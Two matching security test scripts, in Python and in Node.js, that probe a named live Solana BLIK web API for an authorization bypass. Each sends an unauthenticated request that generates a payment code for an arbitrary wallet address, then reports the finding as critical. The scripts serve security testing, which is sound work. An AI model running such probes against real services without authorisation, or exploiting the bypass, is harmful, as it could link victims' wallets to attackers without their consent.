File: test_authz_vuln_01.py
#!/usr/bin/env python3
"""
Security Test: AUTHZ-VULN-01
Tests if POST /api/codes/generate accepts arbitrary wallet addresses without signature verification.
"""

import requests
import json

def test_authz_vuln_01():
    """
    Test if we can generate BLIK codes for arbitrary wallet addresses without owning them.
    This tests authorization bypass vulnerability.
    """

    print("=" * 70)
    print("SECURITY TEST: AUTHZ-VULN-01")
    print("Testing: Authorization Bypass in Code Generation")
    print("=" * 70)
    print()

    # Test configuration
    target_url = "https://solana-blik.vercel.app/api/codes/generate"
    test_wallet = "11111111111111111111111111111111"  # Arbitrary wallet address

    print(f"Target URL: {target_url}")
    print(f"Test Wallet: {test_wallet}")
    print(f"Method: POST")
    print()

    # Prepare request
    headers = {
        "Content-Type": "application/json"
    }

    payload = {
        "walletPubkey": test_wallet
    }

    print("Request Headers:")
    print(json.dumps(headers, indent=2))
    print()
    print("Request Body:")
    print(json.dumps(payload, indent=2))
    print()
    print("-" * 70)
    print("SENDING REQUEST...")
    print("-" * 70)
    print()

    try:
        # Make the POST request
        response = requests.post(
            target_url,
            headers=headers,
            json=payload,
            timeout=10
        )

        # Print response details
        print(f"Status Code: {response.status_code}")
        print()
        print("Response Headers:")
        for key, value in response.headers.items():
            print(f"  {key}: {value}")
        print()
        print("Response Body:")
        try:
            response_json = response.json()
            print(json.dumps(response_json, indent=2))
            print()
        except json.JSONDecodeError:
            print(response.text)
            print()

        print("-" * 70)
        print("VULNERABILITY ASSESSMENT")
        print("-" * 70)
        print()

        # Analyze the response
        if response.status_code == 200:
            try:
                response_data = response.json()

                # Check if we got a code back
                if "code" in response_data and "expiresIn" in response_data:
                    code = response_data.get("code", "")
                    expires_in = response_data.get("expiresIn", 0)

                    # Verify it's a 6-digit code
                    if isinstance(code, str) and len(code) == 6 and code.isdigit():
                        print("🚨 VULNERABILITY CONFIRMED: AUTHZ-VULN-01")
                        print()
                        print("Finding:")
                        print("  The API generated a BLIK code for an arbitrary wallet address")
                        print("  without requiring signature verification or proof of ownership.")
                        print()
                        print("Evidence:")
                        print(f"  - Generated Code: {code}")
                        print(f"  - Expires In: {expires_in} seconds")
                        print(f"  - Wallet Address: {test_wallet}")
                        print()
                        print("Impact:")
                        print("  An attacker can generate BLIK codes for ANY wallet address,")
                        print("  potentially linking victims' wallets to attacker-controlled")
                        print("  phone numbers without their knowledge or consent.")
                        print()
                        print("Severity: CRITICAL")
                        return True
                    else:
                        print("⚠️  Unexpected Response Format")
                        print(f"  Received code: {code}")
                        print("  Expected: 6-digit numeric code")
                else:
                    print("⚠️  Unexpected Response Structure")
                    print(f"  Missing expected fields: 'code' and/or 'expiresIn'")
                    print(f"  Received: {list(response_data.keys())}")
            except json.JSONDecodeError:
                print("⚠️  Response is not valid JSON")
                print(f"  Response text: {response.text}")

        elif response.status_code == 400:
            print("✅ VULNERABILITY NOT PRESENT (Expected Behavior)")
            print()
            print("The API rejected the request with a 400 Bad Request status.")
            print("This suggests proper input validation or authorization checks.")
            try:
                error_data = response.json()
                print(f"Error message: {error_data}")
            except:
                pass

        elif response.status_code == 401 or response.status_code == 403:
            print("✅ VULNERABILITY NOT PRESENT (Expected Behavior)")
            print()
            print(f"The API rejected the request with a {response.status_code} status.")
            print("This indicates proper authorization checks are in place.")
            try:
                error_data = response.json()
                print(f"Error message: {error_data}")
            except:
                pass

        else:
            print(f"⚠️  Unexpected Status Code: {response.status_code}")
            print("Further investigation required.")

        print()
        return False

    except requests.exceptions.RequestException as e:
        print(f"❌ ERROR: Request failed")
        print(f"Exception: {type(e).__name__}")
        print(f"Details: {str(e)}")
        print()
        return False

    except Exception as e:
        print(f"❌ ERROR: Unexpected exception")
        print(f"Exception: {type(e).__name__}")
        print(f"Details: {str(e)}")
        print()
        return False

if __name__ == "__main__":
    test_authz_vuln_01()

File: test_authz_vuln_01.js
#!/usr/bin/env node
/**
 * Security Test: AUTHZ-VULN-01
 * Tests if POST /api/codes/generate accepts arbitrary wallet addresses without signature verification.
 */

const https = require('https');

async function testAuthzVuln01() {
  console.log('='.repeat(70));
  console.log('SECURITY TEST: AUTHZ-VULN-01');
  console.log('Testing: Authorization Bypass in Code Generation');
  console.log('='.repeat(70));
  console.log();

  // Test configuration
  const targetUrl = 'https://solana-blik.vercel.app/api/codes/generate';
  const testWallet = '11111111111111111111111111111111'; // Arbitrary wallet address

  console.log(`Target URL: ${targetUrl}`);
  console.log(`Test Wallet: ${testWallet}`);
  console.log(`Method: POST`);
  console.log();

  const payload = {
    walletPubkey: testWallet
  };

  const payloadStr = JSON.stringify(payload);

  console.log('Request Headers:');
  console.log('  Content-Type: application/json');
  console.log();
  console.log('Request Body:');
  console.log(JSON.stringify(payload, null, 2));
  console.log();
  console.log('-'.repeat(70));
  console.log('SENDING REQUEST...');
  console.log('-'.repeat(70));
  console.log();

  return new Promise((resolve, reject) => {
    const options = {
      hostname: 'solana-blik.vercel.app',
      port: 443,
      path: '/api/codes/generate',
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Content-Length': Buffer.byteLength(payloadStr)
      }
    };

    const req = https.request(options, (res) => {
      let data = '';

      res.on('data', (chunk) => {
        data += chunk;
      });

      res.on('end', () => {
        console.log(`Status Code: ${res.statusCode}`);
        console.log();
        console.log('Response Headers:');
        Object.entries(res.headers).forEach(([key, value]) => {
          console.log(`  ${key}: ${value}`);
        });
        console.log();
        console.log('Response Body:');

        let responseData;
        try {
          responseData = JSON.parse(data);
          console.log(JSON.stringify(responseData, null, 2));
        } catch (e) {
          console.log(data);
        }
        console.log();

        console.log('-'.repeat(70));
        console.log('VULNERABILITY ASSESSMENT');
        console.log('-'.repeat(70));
        console.log();

        // Analyze the response
        if (res.statusCode === 200) {
          try {
            if (!responseData) {
              responseData = JSON.parse(data);
            }

            // Check if we got a code back
            if (responseData.code && responseData.expiresIn !== undefined) {
              const code = responseData.code;
              const expiresIn = responseData.expiresIn;

              // Verify it's a 6-digit code
              if (typeof code === 'string' && code.length === 6 && /^\d{6}$/.test(code)) {
                console.log('🚨 VULNERABILITY CONFIRMED: AUTHZ-VULN-01');
                console.log();
                console.log('Finding:');
                console.log('  The API generated a BLIK code for an arbitrary wallet address');
                console.log('  without requiring signature verification or proof of ownership.');
                console.log();
                console.log('Evidence:');
                console.log(`  - Generated Code: ${code}`);
                console.log(`  - Expires In: ${expiresIn} seconds`);
                console.log(`  - Wallet Address: ${testWallet}`);
                console.log();
                console.log('Impact:');
                console.log('  An attacker can generate BLIK codes for ANY wallet address,');
                console.log('  potentially linking victims\' wallets to attacker-controlled');
                console.log('  phone numbers without their knowledge or consent.');
                console.log();
                console.log('Severity: CRITICAL');
                resolve(true);
              } else {
                console.log('⚠️  Unexpected Response Format');
                console.log(`  Received code: ${code}`);
                console.log('  Expected: 6-digit numeric code');
                resolve(false);
              }
            } else {
              console.log('⚠️  Unexpected Response Structure');
              console.log(`  Missing expected fields: 'code' and/or 'expiresIn'`);
              console.log(`  Received: ${Object.keys(responseData).join(', ')}`);
              resolve(false);
            }
          } catch (e) {
            console.log('⚠️  Response is not valid JSON');
            console.log(`  Response text: ${data}`);
            resolve(false);
          }
        } else if (res.statusCode === 400) {
          console.log('✅ VULNERABILITY NOT PRESENT (Expected Behavior)');
          console.log();
          console.log('The API rejected the request with a 400 Bad Request status.');
          console.log('This suggests proper input validation or authorization checks.');
          try {
            if (!responseData) {
              responseData = JSON.parse(data);
            }
            console.log(`Error message: ${JSON.stringify(responseData)}`);
          } catch (e) {
            // Ignore
          }
          resolve(false);
        } else if (res.statusCode === 401 || res.statusCode === 403) {
          console.log('✅ VULNERABILITY NOT PRESENT (Expected Behavior)');
          console.log();
          console.log(`The API rejected the request with a ${res.statusCode} status.`);
          console.log('This indicates proper authorization checks are in place.');
          try {
            if (!responseData) {
              responseData = JSON.parse(data);
            }
            console.log(`Error message: ${JSON.stringify(responseData)}`);
          } catch (e) {
            // Ignore
          }
          resolve(false);
        } else {
          console.log(`⚠️  Unexpected Status Code: ${res.statusCode}`);
          console.log('Further investigation required.');
          resolve(false);
        }
        console.log();
      });
    });

    req.on('error', (e) => {
      console.log('❌ ERROR: Request failed');
      console.log(`Error: ${e.message}`);
      console.log();
      reject(e);
    });

    req.on('timeout', () => {
      console.log('❌ ERROR: Request timeout');
      req.destroy();
      reject(new Error('Request timeout'));
    });

    req.setTimeout(10000);
    req.write(payloadStr);
    req.end();
  });
}

// Execute the test
testAuthzVuln01()
  .then(() => {
    process.exit(0);
  })
  .catch((error) => {
    console.error('Test execution failed:', error);
    process.exit(1);
  });
